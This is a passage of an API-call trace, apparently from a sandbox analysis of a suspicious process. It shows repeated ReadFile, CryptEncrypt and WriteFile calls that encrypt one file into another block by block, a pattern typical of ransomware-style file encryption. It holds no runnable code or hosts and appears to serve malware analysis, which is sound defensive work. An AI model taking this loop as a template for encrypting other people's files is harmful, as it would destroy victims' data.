lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.301] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.301] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.301] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.301] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.301] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.301] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.301] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.301] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.302] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.302] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.302] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.302] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.302] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.302] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.302] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.302] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.302] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.302] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.302] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.302] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.302] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.303] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.303] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.303] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.303] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.303] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.303] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.303] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.303] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.303] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.303] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.303] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.303] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.303] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.303] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.304] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.304] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.304] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.304] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.304] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.304] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.304] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.304] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.304] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.304] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.304] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.304] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.304] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.304] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.304] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.305] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.305] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.305] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.305] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.305] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.305] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.305] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.305] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.305] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.305] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.305] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.305] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.305] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.305] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.306] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.306] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.306] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.306] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.306] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.306] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.306] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.306] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.306] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.306] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.306] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.306] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.306] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.306] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.307] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.307] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.307] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.307] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.307] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.307] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.307] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.307] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.307] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.307] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.307] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.307] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.307] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.307] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.308] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.308] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.308] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.308] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.308] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.308] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.308] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.308] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.308] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.308] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.308] CryptEncrypt (in: hKey=0x28e8078, 